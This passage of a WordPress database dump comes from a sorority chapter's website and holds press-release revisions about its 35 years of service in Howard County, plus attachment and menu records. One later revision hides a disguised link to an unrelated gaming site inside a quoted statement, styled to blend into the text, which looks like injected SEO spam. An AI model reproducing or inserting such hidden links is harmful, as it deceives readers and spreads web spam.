<strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#2741a6\" ][/button]','LGZ Celebrates 35 Years of Service to Howard County, MD','','inherit','closed','closed','','956-revision-v1','','','2017-01-16 05:15:26','2017-01-16 10:15:26','',956,'https://zphiblgz.org/956-revision-v1/',0,'revision','',0),(960,1,'2017-01-16 10:06:32','2017-01-16 15:06:32','','MOD','','inherit','open','closed','','mod','','','2017-01-16 10:06:32','2017-01-16 15:06:32','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/MOD.png',0,'attachment','image/png',0),(961,1,'2017-01-16 10:06:46','2017-01-16 15:06:46','','NAACP','','inherit','open','closed','','naacp','','','2017-01-16 10:06:46','2017-01-16 15:06:46','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/NAACP.png',0,'attachment','image/png',0),(962,1,'2017-01-16 10:07:10','2017-01-16 15:07:10','','AACR (1)','','inherit','open','closed','','aacr-1','','','2017-01-16 10:07:10','2017-01-16 15:07:10','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/AACR-1.png',0,'attachment','image/png',0),(963,1,'2017-01-16 10:16:06','2017-01-16 15:16:06','','mcvet','','inherit','open','closed','','mcvet','','','2017-01-16 10:16:06','2017-01-16 15:16:06','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/mcvet.png',0,'attachment','image/png',0),(964,1,'2017-01-16 10:25:56','2017-01-16 15:25:56','','FINAL2017APPAPartnership (2)','','inherit','open','closed','','final2017appapartnership-2','','','2017-01-16 10:25:56','2017-01-16 15:25:56','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/FINAL2017APPAPartnership-2.pdf',0,'attachment','application/pdf',0),(966,1,'2017-01-16 10:52:58','2017-01-16 15:52:58','','ScholarshipPic2','','inherit','open','closed','','scholarshippic2','','','2017-01-16 10:52:58','2017-01-16 15:52:58','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/ScholarshipPic2.jpg',0,'attachment','image/jpeg',0),(967,1,'2017-01-16 10:53:07','2017-01-16 15:53:07','','ScholarshipPic','','inherit','open','closed','','scholarshippic','','','2017-01-16 10:53:07','2017-01-16 15:53:07','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/ScholarshipPic.jpg',0,'attachment','image/jpeg',0),(968,1,'2017-01-16 10:53:15','2017-01-16 15:53:15','','ScholarshipPic3','','inherit','open','closed','','scholarshippic3','','','2017-01-16 10:53:15','2017-01-16 15:53:15','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/ScholarshipPic3.jpg',0,'attachment','image/jpeg',0),(969,1,'2017-01-16 11:01:20','2017-01-16 16:01:20','','YearofService','','inherit','open','closed','','yearofservice','','','2017-01-16 11:01:20','2017-01-16 16:01:20','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/YearofService.png',0,'attachment','image/png',0),(970,1,'2017-01-16 11:07:11','2017-01-16 16:07:11','','footsteps2017','','inherit','open','closed','','footsteps2017','','','2017-01-16 11:07:11','2017-01-16 16:07:11','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/footsteps2017.jpg',0,'attachment','image/jpeg',0),(971,1,'2017-01-16 11:10:05','2017-01-16 16:10:05','','905736873100616160117','','inherit','open','closed','','905736873100616160117','','','2017-01-16 11:10:05','2017-01-16 16:10:05','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/905736873100616160117.png',0,'attachment','image/png',0),(973,1,'2017-01-16 11:40:33','2017-01-16 16:40:33','','MembershipKey','','inherit','open','closed','','membershipkey','','','2017-01-16 11:40:33','2017-01-16 16:40:33','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/MembershipKey.png',0,'attachment','image/png',0),(975,1,'2017-01-16 11:47:52','2017-01-16 16:47:52','','Centennial','','inherit','open','closed','','centennial','','','2017-01-16 11:47:52','2017-01-16 16:47:52','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/Centennial.jpg',0,'attachment','image/jpeg',0),(976,1,'2017-01-16 12:02:05','2017-01-16 17:02:05','','We Want You Back!','','inherit','open','closed','','we-want-you-back','','','2017-01-16 12:02:05','2017-01-16 17:02:05','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/We-Want-You-Back.png',0,'attachment','image/png',0),(1183,1,'2017-09-29 20:37:10','2017-09-30 01:37:10','','State of Maryland','','inherit','closed','closed','','state-of-maryland','','','2017-09-29 20:37:10','2017-09-30 01:37:10','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/State-of-Maryland.png',0,'attachment','image/png',0),(1184,1,'2017-09-29 20:40:50','2017-09-30 01:40:50','','IMG_9335','','inherit','closed','closed','','img_9335','','','2017-09-29 20:40:50','2017-09-30 01:40:50','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/IMG_9335.jpg',0,'attachment','image/jpeg',0),(984,1,'2017-01-16 19:25:48','0000-00-00 00:00:00','','November 2016 Reports','','draft','open','closed','','','','','2017-01-16 19:25:48','2017-01-17 00:25:48','',0,'https://zphiblgz.org/?post_type=wpdmpro&#038;p=984',0,'wpdmpro','',0),(986,1,'2017-01-16 19:24:11','2017-01-17 00:24:11','','101616 minutes','','inherit','open','closed','','101616-minutes','','','2017-01-16 19:24:11','2017-01-17 00:24:11','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/101616-minutes.doc',0,'attachment','application/msword',0),(989,1,'2017-01-17 14:33:38','2017-01-17 19:33:38','','Constitution & By-Laws','','publish','open','closed','','constitution-by-laws','','','2017-01-17 14:33:38','2017-01-17 19:33:38','',0,'https://zphiblgz.org/?post_type=wpdmpro&#038;p=989',0,'wpdmpro','',0),(994,2,'2017-01-25 22:52:19','2017-01-26 03:52:19','','Kathy Ball','','inherit','open','closed','','kathy-ball-2','','','2017-01-25 22:52:19','2017-01-26 03:52:19','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Kathy-Ball.jpg',0,'attachment','image/jpeg',0),(991,1,'2017-01-17 14:40:25','2017-01-17 19:40:25','','AARC','','publish','open','closed','','aarc','','','2017-01-17 14:42:22','2017-01-17 19:42:22','',0,'https://zphiblgz.org/?post_type=wpdmpro&#038;p=991',0,'wpdmpro','',0),(999,1,'2017-02-02 18:37:19','2017-02-02 23:37:19','[gravityform id=\"5\" title=\"false\" description=\"false\"]','Youth Auxiliary','','inherit','closed','closed','','738-autosave-v1','','','2017-02-02 18:37:19','2017-02-02 23:37:19','',738,'https://zphiblgz.org/738-autosave-v1/',0,'revision','',0),(1004,1,'2017-02-20 20:38:27','2017-02-21 01:38:27','','Black Expo','','inherit','open','closed','','black-expo','','','2017-02-20 20:38:27','2017-02-21 01:38:27','',0,'https://zphiblgz.org/wp-content/uploads/2017/02/Black-Expo.jpg',0,'attachment','image/jpeg',0),(1273,1,'2018-03-21 22:42:29','2018-03-22 03:42:29','','MarchofDimesButton (1)','','inherit','closed','closed','','marchofdimesbutton-1','','','2018-03-21 22:42:29','2018-03-22 03:42:29','',0,'https://zphiblgz.org/wp-content/uploads/2017/02/MarchofDimesButton-1.png',0,'attachment','image/png',0),(1010,1,'2017-02-26 11:00:08','2017-02-26 16:00:08','','IMG_1343','','inherit','open','closed','','img_1343','','','2017-02-26 11:00:08','2017-02-26 16:00:08','',0,'https://zphiblgz.org/wp-content/uploads/2017/02/IMG_1343.gif',0,'attachment','image/gif',0),(1014,1,'2017-03-04 18:55:58','2017-03-04 23:55:58','','IMG_1374','','inherit','open','closed','','img_1374','','','2017-03-04 18:55:58','2017-03-04 23:55:58','',0,'https://zphiblgz.org/wp-content/uploads/2017/03/IMG_1374.png',0,'attachment','image/png',0),(1023,1,'2017-04-18 17:19:30','2017-04-18 22:19:30','','March of Dimes','','publish','open','open','','march-of-dimes','','','2017-04-18 17:23:33','2017-04-18 22:23:33','',0,'https://zphiblgz.org/?post_type=cause&#038;p=1023',0,'cause','',0),(1025,1,'2017-03-14 11:36:23','2017-03-14 16:36:23','','LGZWineryFlyer','','inherit','open','closed','','lgzwineryflyer','','','2017-03-14 11:36:23','2017-03-14 16:36:23','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/LGZWineryFlyer.png',0,'attachment','image/png',0),(1024,1,'2017-03-14 11:30:55','2017-03-14 16:30:55','&lt;script language=\"javascript\" type=\"text/javascript\" src=\"https://www.marchforbabies.org/includes/badge_2011_vert_js.asp?w=8215100&amp;u=Crystalwhitaker&amp;bt=2\"&gt;&lt;/script&gt;','March of Dimes','','inherit','closed','closed','','1023-revision-v1','','','2017-03-14 11:30:55','2017-03-14 16:30:55','',1023,'https://zphiblgz.org/1023-revision-v1/',0,'revision','',0),(1026,1,'2017-03-14 11:47:28','2017-03-14 16:47:28','','MOD (1)','','inherit','open','closed','','mod-1','','','2017-03-14 11:47:28','2017-03-14 16:47:28','',0,'https://zphiblgz.org/wp-content/uploads/2017/02/MOD-1.png',0,'attachment','image/png',0),(1027,1,'2017-03-14 11:49:04','2017-03-14 16:49:04','','werewalking-purple','','inherit','open','closed','','werewalking-purple','','','2017-03-14 11:49:04','2017-03-14 16:49:04','',0,'https://zphiblgz.org/wp-content/uploads/2017/02/werewalking-purple.jpg',0,'attachment','image/jpeg',0),(1035,1,'2017-04-15 11:20:27','2017-04-15 16:20:27','','SpiritNight (1)','','inherit','open','closed','','spiritnight-1','','','2017-04-15 11:20:27','2017-04-15 16:20:27','',0,'https://zphiblgz.org/wp-content/uploads/2017/04/SpiritNight-1.pdf',0,'attachment','application/pdf',0),(1036,1,'2017-04-15 11:21:07','2017-04-15 16:21:07','','SpiritNight','','inherit','open','closed','','spiritnight','','','2017-04-15 11:21:07','2017-04-15 16:21:07','',0,'https://zphiblgz.org/wp-content/uploads/2017/04/SpiritNight.jpg',0,'attachment','image/jpeg',0),(1041,1,'2017-04-18 16:15:11','2017-04-18 21:15:11','','SwirlSip','','inherit','open','closed','','swirlsip','','','2017-04-18 16:15:11','2017-04-18 21:15:11','',0,'https://zphiblgz.org/wp-content/uploads/2017/04/SwirlSip.png',0,'attachment','image/png',0),(1043,1,'2017-04-18 16:16:48','2017-04-18 21:16:48','','Swirl','','inherit','open','closed','','swirl','','','2017-04-18 16:16:48','2017-04-18 21:16:48','',0,'https://zphiblgz.org/wp-content/uploads/2017/04/Swirl.png',0,'attachment','image/png',0),(1045,1,'2017-04-18 16:59:37','2017-04-18 21:59:37','','SpiritNightTN','','inherit','open','closed','','spiritnighttn','','','2017-04-18 16:59:37','2017-04-18 21:59:37','',0,'https://zphiblgz.org/wp-content/uploads/2017/04/SpiritNightTN.png',0,'attachment','image/png',0),(1047,1,'2017-04-18 17:11:03','2017-04-18 22:11:03','','celebrate','','inherit','open','closed','','celebrate','','','2017-04-18 17:11:03','2017-04-18 22:11:03','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/celebrate.jpg',0,'attachment','image/jpeg',0),(1048,1,'2017-04-18 17:19:30','2017-04-18 22:19:30','','March of Dimes','','inherit','closed','closed','','1023-revision-v1','','','2017-04-18 17:19:30','2017-04-18 22:19:30','',1023,'https://zphiblgz.org/1023-revision-v1/',0,'revision','',0),(1049,1,'2017-04-18 17:28:09','2017-04-18 22:28:09','','March of Dimes','','inherit','closed','closed','','90-autosave-v1','','','2017-04-18 17:28:09','2017-04-18 22:28:09','',90,'https://zphiblgz.org/90-autosave-v1/',0,'revision','',0),(1050,1,'2017-04-18 17:28:41','2017-04-18 22:28:41','','March of Dimes','','inherit','closed','closed','','90-revision-v1','','','2017-04-18 17:28:41','2017-04-18 22:28:41','',90,'https://zphiblgz.org/90-revision-v1/',0,'revision','',0),(1051,1,'2017-04-18 17:33:00','2017-04-18 22:33:00','','MODCOVER','','inherit','open','closed','','modcover','','','2017-04-18 17:33:00','2017-04-18 22:33:00','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/MODCOVER.png',0,'attachment','image/png',0),(1057,1,'2017-05-20 06:51:34','2017-05-20 11:51:34','','synchronicity','','inherit','open','closed','','synchronicity','','','2017-05-20 06:51:34','2017-05-20 11:51:34','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/synchronicity.png',0,'attachment','image/png',0),(1058,1,'2017-05-20 06:53:34','2017-05-20 11:53:34','','CRCARES_WEB_742x275','','inherit','open','closed','','crcares_web_742x275','','','2017-05-20 07:11:43','2017-05-20 12:11:43','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/CRCARES_WEB_742x275.jpg',0,'attachment','image/jpeg',0),(1059,1,'2017-05-20 07:15:13','2017-05-20 12:15:13','','BB','','inherit','open','closed','','bb','','','2017-05-20 07:15:13','2017-05-20 12:15:13','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/BB.png',0,'attachment','image/png',0),(1060,1,'2017-05-20 07:15:53','2017-05-20 12:15:53','','Fenise','','inherit','open','closed','','fenise','','','2017-05-20 07:15:53','2017-05-20 12:15:53','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Fenise.png',0,'attachment','image/png',0),(1061,1,'2017-05-20 07:16:31','2017-05-20 12:16:31','','SylviaD','','inherit','open','closed','','sylviad','','','2017-05-20 07:16:31','2017-05-20 12:16:31','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/SylviaD.png',0,'attachment','image/png',0),(1062,1,'2017-05-20 07:18:03','2017-05-20 12:18:03','','MAC','','inherit','open','closed','','mac','','','2017-05-20 07:18:03','2017-05-20 12:18:03','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/MAC.png',0,'attachment','image/png',0),(1063,1,'2017-05-20 07:18:42','2017-05-20 12:18:42','','Claires','','inherit','open','closed','','claires','','','2017-05-20 07:18:42','2017-05-20 12:18:42','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Claires.png',0,'attachment','image/png',0),(1064,1,'2017-05-20 07:19:27','2017-05-20 12:19:27','','CharlotteRuss','','inherit','open','closed','','charlotteruss','','','2017-05-20 07:19:27','2017-05-20 12:19:27','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/CharlotteRuss.png',0,'attachment','image/png',0),(1065,1,'2017-05-20 07:20:33','2017-05-20 12:20:33','','SYNCHBOUTIQUE','','inherit','open','closed','','synchboutique','','','2017-05-20 07:20:33','2017-05-20 12:20:33','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/SYNCHBOUTIQUE.png',0,'attachment','image/png',0),(1066,1,'2017-05-20 07:21:55','2017-05-20 12:21:55','','JazzyJazmine','','inherit','open','closed','','jazzyjazmine','','','2017-05-20 07:21:55','2017-05-20 12:21:55','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/JazzyJazmine.png',0,'attachment','image/png',0),(1067,1,'2017-05-20 07:21:57','2017-05-20 12:21:57','','Starbucks','','inherit','open','closed','','starbucks','','','2017-05-20 07:21:57','2017-05-20 12:21:57','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Starbucks.png',0,'attachment','image/png',0),(1068,1,'2017-05-20 07:22:00','2017-05-20 12:22:00','','MAC','','inherit','open','closed','','mac-2','','','2017-05-20 07:22:00','2017-05-20 12:22:00','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/MAC-1.png',0,'attachment','image/png',0),(1069,1,'2017-05-20 07:22:03','2017-05-20 12:22:03','','Claires','','inherit','open','closed','','claires-2','','','2017-05-20 07:22:03','2017-05-20 12:22:03','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Claires-1.png',0,'attachment','image/png',0),(1070,1,'2017-05-20 07:22:05','2017-05-20 12:22:05','','Sephora','','inherit','open','closed','','sephora','','','2017-05-20 07:22:05','2017-05-20 12:22:05','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Sephora.png',0,'attachment','image/png',0),(1071,1,'2017-05-20 07:22:07','2017-05-20 12:22:07','','CharlotteRuss','','inherit','open','closed','','charlotteruss-2','','','2017-05-20 07:22:07','2017-05-20 12:22:07','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/CharlotteRuss-1.png',0,'attachment','image/png',0),(1072,1,'2017-05-20 07:22:09','2017-05-20 12:22:09','','ALDO','','inherit','open','closed','','aldo','','','2017-05-20 07:22:09','2017-05-20 12:22:09','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/ALDO.png',0,'attachment','image/png',0),(1073,1,'2017-05-20 07:22:11','2017-05-20 12:22:11','','Nordstrom','','inherit','open','closed','','nordstrom','','','2017-05-20 07:22:11','2017-05-20 12:22:11','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Nordstrom.png',0,'attachment','image/png',0),(1074,1,'2017-05-20 07:22:13','2017-05-20 12:22:13','','CCSC','','inherit','open','closed','','ccsc','','','2017-05-20 07:22:13','2017-05-20 12:22:13','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/CCSC.png',0,'attachment','image/png',0),(1075,1,'2017-05-20 07:22:15','2017-05-20 12:22:15','','chcares','','inherit','open','closed','','chcares','','','2017-05-20 07:22:15','2017-05-20 12:22:15','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/chcares.png',0,'attachment','image/png',0),(1076,1,'2017-05-20 07:35:10','2017-05-20 12:35:10','','Sweets','','inherit','open','closed','','sweets','','','2017-05-20 07:35:10','2017-05-20 12:35:10','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Sweets.png',0,'attachment','image/png',0),(1077,1,'2017-05-20 07:35:34','2017-05-20 12:35:34','','Icing','','inherit','open','closed','','icing','','','2017-05-20 07:35:34','2017-05-20 12:35:34','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Icing.png',0,'attachment','image/png',0),(1085,2,'2017-05-23 15:03:03','2017-05-23 20:03:03','','image2','','inherit','open','closed','','image2','','','2017-05-23 15:03:03','2017-05-23 20:03:03','',0,'https://zphiblgz.org/wp-content/uploads/2017/05/image2.jpg',0,'attachment','image/jpeg',0),(1098,1,'2017-07-21 14:31:09','2017-07-21 19:31:09','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to <a style=\"color:#000;text-decoration:none\" href=\"http://twodigitsgame.com/\">twodigitsgame</a>  expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#2741a6\" ][/button]','LGZ Celebrates 35 Years of Service to Howard County, MD','','inherit','closed','closed','','956-revision-v1','','','2017-07-21 14:31:09','2017-07-21 19:31:09','',956,'https://zphiblgz.org/956-revision-v1/',0,'revision','',0),(1102,1,'2017-08-09 21:37:15','0000-00-00 00:00:00','','W. Ruth Conway Scholarship Application','','draft','closed','closed','','','','','2017-08-09 21:37:15','2017-08-10 02:37:15','',0,'https://zphiblgz.org/?post_type=aol_ad&#038;p=1102',0,'aol_ad','',0),(1418,1,'2020-08-17 14:11:07','2020-08-17 19:11:07','','Mic Check 2 flyer - FINALfinal','','inherit','closed','closed','','mic-check-2-flyer-finalfinal','','','2020-08-17 14:11:07','2020-08-17 19:11:07','',0,'https://zphiblgz.org/wp-content/uploads/2020/08/Mic-Check-2-flyer-FINALfinal.png',0,'attachment','image/png',0),(1454,1,'2021-09-22 13:13:07','0000-00-00 00:00:00','','Auto Draft','','auto-draft','closed','closed','','','','','2021-09-22 13:13:07','0000-00-00 00:00:00','',0,'https://zphiblgz.org/?post_type=eventbrite_events&p=1454',0,'eventbrite_events','',0),(1116,1,'2017-08-26 07:35:32','2017-08-26 12:35:32','','Informational Flyer','','inherit','open','closed','','informational-flyer','','','2017-08-26 07:35:32','2017-08-26 12:35:32','',0,'https://zphiblgz.org/wp-content/uploads/2017/08/Informational-Flyer.png',0,'attachment','image/png',0),(1121,1,'2017-09-04 12:57:43','2017-09-04 17:57:43','','Award Winning','','inherit','open','closed','','award-winning','','','2017-09-04 12:57:43','2017-09-04 17:57:43','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/Award-Winning.png',0,'attachment','image/png',0),(1386,1,'2020-07-07 11:24:33','2020-07-07 16:24:33','','reclaims','','inherit','closed','closed','','reclaims-2','','','2020-07-07 11:24:33','2020-07-07 16:24:33','',0,'https://zphiblgz.org/wp-content/uploads/2020/07/reclaims-1.jpg',0,'attachment','image/jpeg',0),(1125,1,'2017-09-09 08:49:32','2017-09-09 13:49:32','','AACRTrial','','inherit','open','closed','','aacrtrial','','','2017-09-09 08:49:32','2017-09-09 13:49:32','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/AACRTrial.png',0,'attachment','image/png',0),(1126,1,'2017-09-09 08:51:53','2017-09-09 13:51:53','','AACRTrial2','','inherit','open','closed','','aacrtrial2','','','2017-09-09 08:51:53','2017-09-09 13:51:53','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/AACRTrial2.png',0,'attachment','image/png',0),(1130,1,'2017-09-09 09:49:22','2017-09-09 14:49:22','','voterregistration','','inherit','closed','closed','','voterregistration','','','2017-09-09 09:49:22','2017-09-09 14:49:22','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/voterregistration.png',0,'attachment','image/png',0),(1131,1,'2017-09-09 09:51:53','2017-09-09 14:51:53','','Vote_Wordpress','','inherit','closed','closed','','vote_wordpress','','','2017-09-09 09:51:53','2017-09-09 14:51:53','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/Vote_Wordpress.png',0,'attachment','image/png',0),(1137,1,'2017-09-09 11:45:35','2017-09-09 16:45:35','','founders-vintage','','inherit','closed','closed','','founders-vintage','','','2017-09-09 11:45:35','2017-09-09 16:45:35','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/founders-vintage.jpg',0,'attachment','image/jpeg',0),(1138,1,'2017-09-09 12:13:25','2017-09-09 17:13:25','','Service','','inherit','closed','closed','','247-revision-v1','','','2017-09-09 12:13:25','2017-09-09 17:13:25','',247,'https://zphiblgz.org/247-revision-v1/',0,'revision','',0),(1292,1,'2018-09-14 21:01:16','2018-09-15 02:01:16','','Proclamation','','inherit','closed','closed','','proclamation-2','','','2018-09-14 21:01:16','2018-09-15 02:01:16','',0,'https://zphiblgz.org/wp-content/uploads/2018/09/Proclamation.png',0,'attachment','image/png',0),(1293,1,'2018-09-14 21:01:59','2018-09-15 02:01:59','','ExecutiveResize','','inherit','closed','closed','','executiveresize','','','2018-09-14 21:01:59','2018-09-15 02:01:59','',0,'https://zphiblgz.org/wp-content/uploads/2018/09/ExecutiveResize.png',0,'attachment','image/png',0),(1141,1,'2017-09-09 12:26:07','2017-09-09 17:26:07',' ','','','publish','closed','closed','','1141','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',247,'https://zphiblgz.org/?p=1141',8,'nav_menu_item','',0),(1142,1,'2017-09-09 12:26:07','2017-09-09 17:26:07',' ','','','publish','closed','closed','','1142','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=1142',4,'nav_menu_item','',0),(1143,1,'2017-09-09 12:26:07','2017-09-09 17:26:07',' ','','','publish','closed','closed','','1143','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',247,'https://zphiblgz.org/?p=1143',9,'nav_menu_item','',0),(1144,1,'2017-09-09 12:26:08','2017-09-09 17:26:08',' ','','','publish','closed','closed','','1144','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',247,'https://zphiblgz.org/?p=1144',10,'nav_menu_item','',0),(1145,1,'2017-09-09 13:37:51','2017-09-09 18:37:51','','image1 (1)','','inherit','closed','closed','','image1-1','','','2017-09-09 13:37:51','2017-09-09 18:37:51','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/image1-1.png',0,'attachment','image/png',0),(1146,1,'2017-09-09 13:49:28','2017-09-09 18:49:28','','NonDistressedWRuthConwayLogo','','inherit','closed','closed','','nondistressedwruthconwaylogo','','','2017-09-09 13:49:28','2017-09-09 18:49:28','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/NonDistressedWRuthConwayLogo.png',0,'attachment','image/png',0),(1147,1,'2017-09-09 14:12:57','2017-09-09 19:12:57','','1000','','inherit','closed','closed','','1000','','','2017-09-09 14:12:57','2017-09-09 19:12:57','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/1000.png',0,'attachment','image/png',0),(1148,1,'2017-09-09 14:18:23','2017-09-09 19:18:23','','1000 (1)','','inherit','closed','closed','','1000-1','','','2017-09-09 14:18:23','2017-09-09 19:18:23','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/1000-1.png',0,'attachment','image/png',0),(1149,1,'2017-09-09 14:35:11','2017-09-09 19:35:11','','zetaword','','inherit','closed','closed','','zetaword','','','2017-09-09 14:35:11','2017-09-09 19:35:11','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/zetaword.jpg',0,'attachment','image/jpeg',0),(1150,1,'2017-09-09 14:38:58','2017-09-09 19:38:58','','wordlogo','','inherit','closed','closed','','wordlogo','','','2017-09-09 14:38:58','2017-09-09 19:38:58','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/wordlogo.gif',0,'attachment','image/gif',0),(1151,1,'2017-09-09 14:59:20','2017-09-09 19:59:20','','ZPB_Unified_Visual_Identi-266','','inherit','closed','closed','','zpb_unified_visual_identi-266','','','2017-09-09 14:59:20','2017-09-09 19:59:20','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/ZPB_Unified_Visual_Identi-266.jpg',0,'attachment','image/jpeg',0),(1153,1,'2017-09-13 06:15:02','2017-09-13 11:15:02','','APPALogo','','inherit','closed','closed','','appalogo','','','2017-09-13 06:15:02','2017-09-13 11:15:02','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/APPALogo.png',0,'attachment','image/png',0),(1154,1,'2017-09-13 06:46:02','2017-09-13 11:46:02','','Youth','','inherit','closed','closed','','youth-2','','','2017-09-13 06:46:02','2017-09-13 11:46:02','',738,'https://zphiblgz.org/wp-content/uploads/2016/12/Youth.png',0,'attachment','image/png',0),(1155,1,'2017-09-13 06:58:27','2017-09-13 11:58:27','','Youth Auxiliaries','','inherit','closed','closed','','738-revision-v1','','','2017-09-13 06:58:27','2017-09-13 11:58:27','',738,'https://zphiblgz.org/738-revision-v1/',0,'revision','',0),(1157,1,'2017-09-13 